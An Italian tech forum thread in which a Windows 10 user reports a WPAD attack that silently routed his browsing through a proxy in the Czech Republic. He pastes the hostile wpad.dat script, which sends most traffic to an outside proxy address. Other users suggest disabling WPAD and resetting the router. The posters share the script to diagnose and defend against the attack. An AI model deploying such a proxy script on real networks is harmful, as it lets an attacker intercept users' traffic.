Torna indietro   Hardware Upgrade Forum > Software > Microsoft Windows > Microsoft Windows 8.1 e 10

PC Specialist Lafité 14 AI AMD: assemblato come vuoi tu
PC Specialist Lafité 14 AI AMD: assemblato come vuoi tu
Il modello "build to order" di PCSpecialist permette di selezionare una struttura base per un sistema, personalizzandolo in base alle specifiche esigenze con una notevole flessibilità di scelta tra i componenti. Il modello Lafité 14 AI AMD è un classico notebook clamshell compatto e potente, capace di assicurare una elevata autonomia di funzionamento anche lontano dalla presa di corrente
Recensione Nothing Phone 4(a): sempre iconico ma ora più concreto
Recensione Nothing Phone 4(a): sempre iconico ma ora più concreto
Nothing con il suo nuovo Phone 4(a) conferma la sua identità visiva puntando su una costruzione che nobilita il policarbonato. La trasparenza resta l'elemento cardine, arricchita da una simmetria interna curata nei minimi dettagli. Il sistema Glyph si evolve, riducendosi nelle dimensioni ma aumentando l'utilità quotidiana grazie a nuove funzioni software integrate e notifiche visive. Ecco tutti i dettagli nella recensione completa
Corsair Vanguard Air 99 Wireless: non si era mai vista una tastiera gaming così professionale
Corsair Vanguard Air 99 Wireless: non si era mai vista una tastiera gaming così professionale
Nelle ultime settimane abbiamo provato la Corsair Vanguard Air 99 Wireless, una tastiera tecnicamente da gaming, ma che in realtà offre un ampio ventaglio di possibilità anche al di fuori delle sessioni di gioco. Flessibilità e funzionalità sono le parole d'ordine di una periferica che si rivolge a chi cerca un prodotto capace di adattarsi a ogni esigenza e ogni piattaforma
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 09-01-2021, 23:39   #1
Collision
Senior Member
 
L'Avatar di Collision
 
Iscritto dal: Mar 2006
Messaggi: 2658
Attacco WPAD reindirizzamento proxy - che fare?

Ciao a tutti,
Non so se é il posto giusto, ma essendo un problema che colpisce soprattutto Windows credo possa interessare diversi..

Connessione: ADSL di Telecom, router wi-fi al quale mi collego (in wi-fi, no ethernet) con PC Windows 10, ando "Rileva automaticamente impostazioni" nei settaggi proxy.

Oggi ho provato a riattivarlo per curiosità e ho visto che il problema si ripresentava: PC inchiodato su internet e gli altri nessun problema.

Giusto per fare qualche prova vado su un sito di speed test è noto che mi riconosce con un ip stranissimo, iniziava con 185.38.xxx ECC ECC...

Dico ma che cavolo é? Io con Telecom ho sempre avuto 85.. o giù di lì.

Vado a disattivare ancora il rilevamento automatico del proxy, torno sul sito speed test e il mio ip torna normale (Telecom).
Vado a investigare e noto che praticamente quando attivo quella impostazione sono sotto un proxy della Repubblica Ceca!!!!! Eppure non ho mai settato nessun proxy in vita mia!!!

Inorridito spengo il pc e inizio a cercare informazioni su internet (con iPad ), ma non essendo esperto di questa cosa non capisco bene, l'unica cosa che ho capito é che lasciando attivato il rilevamento automatico proxy, quando si lancia un browser (Edge nel mio caso, ma anche altri) il browser stesso ricerca nella rete a cui appartiene, e riceve, un file wpad.dat che se ha talune istruzioni lo fanno in automatico passare su un proxy (spiegato a maccheroni). Questo significa naturalmente avere i propri dati di navigazione in mano a qualcuno.

Se si punta ad esempio il browser su http://wpad.domain.name/wpad.dat si ha questo script:

function FindProxyForURL(url, host) {
if (isPlainHostName(host) ||
dnsDomainIs(host, ".windowsupdate.com") ||
dnsDomainIs(host, ".microsoft.com") ||
dnsDomainIs(host, ".baidu.com") ||
dnsDomainIs(host, ".kaspersky.com") ||
dnsDomainIs(host, ".axaltacs.net") ||
dnsDomainIs(host, ".live.com") ||
dnsDomainIs(host, ".drivergenius.com") ||
isInNet(host, "10.0.0.0", "255.0.0.0") ||
isInNet(host, "172.16.0.0", "255.255.224.0") ||
isInNet(host, "192.168.0.0", "255.255.0.0") ||
isInNet(host, "127.0.0.0", "255.0.0.0"))
return "DIRECT";
else
return 'PROXY 185.38.111.1:8080';
}

pare sia un attacco Wpad. e non so perché ci sono finito di mezzo io, o Telecom, o il mio router.

Si accettano suggerimenti o considerazioni. Io brancolo nel buio proprio, a parte tenere disattivata la rilevazione automatica proxy (che in Windows é settata su attiva di default) non so che fare, se preoccuparmi ecc..
__________________
HP PRODESK 400 G6 MT | Intel Core I7-9700 | Kingston Fury Beast 16GB | Gigabyte GTX 1050Ti 4GB | Samsung 970 Evo Plus 256GB + Samsung 870 Evo 1TB | Windows 11 Pro

Ultima modifica di Collision : 10-01-2021 alle 20:07.
Collision è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2021, 08:13   #2
tallines
Senior Member
 
L'Avatar di tallines
 
Iscritto dal: Feb 2009
Messaggi: 50674
Prova a resettare il modem .

O gli cambi tu manualmente i DNS >

Come Cambiare DNS e scegliere i migliori del 2021


Altrimenti >

Disabilita WPAD in Windows per rimanere al sicuro su reti Wi-Fi pubbliche


Come e perché disabilitare il WPAD di Windows 10


Disabilitare WPAD su Windows per chiudere una vulnerabilità

Ultima modifica di tallines : 10-01-2021 alle 08:17.
tallines è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2021, 16:13   #3
Collision
Senior Member
 
L'Avatar di Collision
 
Iscritto dal: Mar 2006
Messaggi: 2658
Grazie per la risposta
Ho sia disattivato il wpad, del resto di usare un proxy con il pc di casa non ne ho proprio bisogno, che resettato il router. Ora non ho più problemi..

Leggendo in giro pare che in tanti abbiano notato questo problema negli ultimi tempi.. e pare riguardi i router Netgear in particolare.

Però se ho capito bene il problema sta nei dns, dovrei quindi prendermela con TIM che lascia scaricare una configurazione proxy del genere..
__________________
HP PRODESK 400 G6 MT | Intel Core I7-9700 | Kingston Fury Beast 16GB | Gigabyte GTX 1050Ti 4GB | Samsung 970 Evo Plus 256GB + Samsung 870 Evo 1TB | Windows 11 Pro
Collision è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2021, 18:20   #4
fraussantin
Senior Member
 
L'Avatar di fraussantin
 
Iscritto dal: May 2009
Città: toscana
Messaggi: 51073
Quote:
Originariamente inviato da Collision Guarda i messaggi
Grazie per la risposta
Ho sia disattivato il wpad, del resto di usare un proxy con il pc di casa non ne ho proprio bisogno, che resettato il router. Ora non ho più problemi..

Leggendo in giro pare che in tanti abbiano notato questo problema negli ultimi tempi.. e pare riguardi i router Netgear in particolare.

Però se ho capito bene il problema sta nei dns, dovrei quindi prendermela con TIM che lascia scaricare una configurazione proxy del genere..
Curiosità come ci si accorge se abbiamo subito quel tipo di attacco?
__________________
MY STEAM & MY PC
"Story in a game is like story in a porn movie. It's expected to be there, but it's not that important." - John Carmack.
fraussantin è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2021, 18:46   #5
Styb
Senior Member
 
L'Avatar di Styb
 
Iscritto dal: Jan 2009
Città: Bannata tempora currunt
Messaggi: 10297
Quote:
Originariamente inviato da fraussantin Guarda i messaggi
Curiosità come ci si accorge se abbiamo subito quel tipo di attacco?
Rileggendo la discussione, l'utente Collision non navigava più disattivando il WPAD, e ciò vuol dire che sei sotto un proxy non voluto, e controllando la geolocalizzazione del suo indirizzo IP si è accorto che era situato nella Repubblica Ceca.
Styb è online   Rispondi citando il messaggio o parte di esso
Old 10-01-2021, 19:01   #6
Collision
Senior Member
 
L'Avatar di Collision
 
Iscritto dal: Mar 2006
Messaggi: 2658
Infatti, il Wpad é attivo di default su Windows, mentre su iOS no, per quello con quelli non avevo problemi.

Basta che vai in qualsiasi sito che ti esibisce l'ip, e vedi se gli risulta il tuo legittimo (Tim, Vodafone o qualunque ISP ti fornisce la connessione) oppure un ip sconosciuto.

Comunque pare che sia una vulnerabilità dimostrata già da tempo, credo centri con il fatto che nelle impostazioni di default di certi router siano specificati nomi di siti fasulli tipo (domain.name... my.domain) che sono tutti tilde che ad oggi si possono pure registrare, quindi basta che uno registri il sito domain.name, dentro ci metta un file che viene scaricato in automatico da tutti i router che hanno impostato quel sito finto, ed il gioco é fatto...

Ripeto, non ne so molto, mi sto piano piano informando solo ora, magari passasse di qua qualcuno che se ne intende.
__________________
HP PRODESK 400 G6 MT | Intel Core I7-9700 | Kingston Fury Beast 16GB | Gigabyte GTX 1050Ti 4GB | Samsung 970 Evo Plus 256GB + Samsung 870 Evo 1TB | Windows 11 Pro
Collision è offline   Rispondi citando il messaggio o parte di esso
Old 10-01-2021, 19:55   #7
Nicodemo Timoteo Taddeo
Senior Member
 
L'Avatar di Nicodemo Timoteo Taddeo
 
Iscritto dal: Mar 2008
Messaggi: 20684
Quote:
Originariamente inviato da Collision Guarda i messaggi
Infatti, il Wpad é attivo di default su Windows, mentre su iOS no, per quello con quelli non avevo problemi.
È stupefacente come Microsoft martelli gli zebedei della gente con gli aggiornamenti automatici obbligatori necessari per la sicurezza e lasci attivate di default cose del genere...
Nicodemo Timoteo Taddeo è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


PC Specialist Lafité 14 AI AMD: assemblato come vuoi tu PC Specialist Lafité 14 AI AMD: assemblat...
Recensione Nothing Phone 4(a): sempre iconico ma ora più concreto Recensione Nothing Phone 4(a): sempre iconico ma...
Corsair Vanguard Air 99 Wireless: non si era mai vista una tastiera gaming così professionale Corsair Vanguard Air 99 Wireless: non si era mai...
Ecovacs DEEBOT T90 PRO OMNI: ora il rullo di lavaggio è ampio Ecovacs DEEBOT T90 PRO OMNI: ora il rullo di lav...
Recensione Samsung Galaxy S26 Ultra: finalmente qualcosa di nuovo Recensione Samsung Galaxy S26 Ultra: finalmente ...
Crimson Desert ora supporta le GPU Intel...
Un waterblock discreto, ma capace di blo...
DREAME L50s Pro Ultra porta i 30.000 Pa ...
I BOOX Go 10.3 (Gen II) arrivano in Ital...
Rasoi elettrici Braun in offerta su Amaz...
Rincari Vodafone fino a 3,99 euro: chi è...
Polemica su Crimson Desert: Pearl Abyss ...
Tutto per Pasqua da 1,99€: come sfruttar...
8 milioni di multa e rischio carcere: la...
L'IA frutta ad Apple quasi 1 miliardo di...
Smartphone come visore o FPV? Oggi DJI N...
Windows 11 migliorerà in tutto: Microsof...
La prima Ferrari elettrica punta su emoz...
Minecraft Dungeons 2 annunciato ufficial...
600W, 55KPa e 70 minuti di autonomia: la...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 11:21.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v